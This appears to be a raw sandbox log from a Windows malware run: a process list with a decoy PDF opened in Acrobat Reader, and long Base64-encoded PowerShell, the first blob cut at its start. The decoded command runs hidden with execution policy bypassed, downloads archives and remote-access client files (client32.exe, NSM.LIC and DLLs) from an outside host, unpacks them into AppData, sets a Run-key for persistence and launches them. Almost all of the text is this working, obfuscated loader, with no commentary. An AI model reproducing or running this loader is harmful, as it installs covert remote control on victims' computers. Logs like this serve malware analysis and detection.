UUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"
C:\Windows\SysWOW64\cmd.exe
cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/fe4cb4db9fe2a79024e9e07150b10e2f/" && (for %F in (*.exe) do start "" "%F")"
C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe
"vlc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcA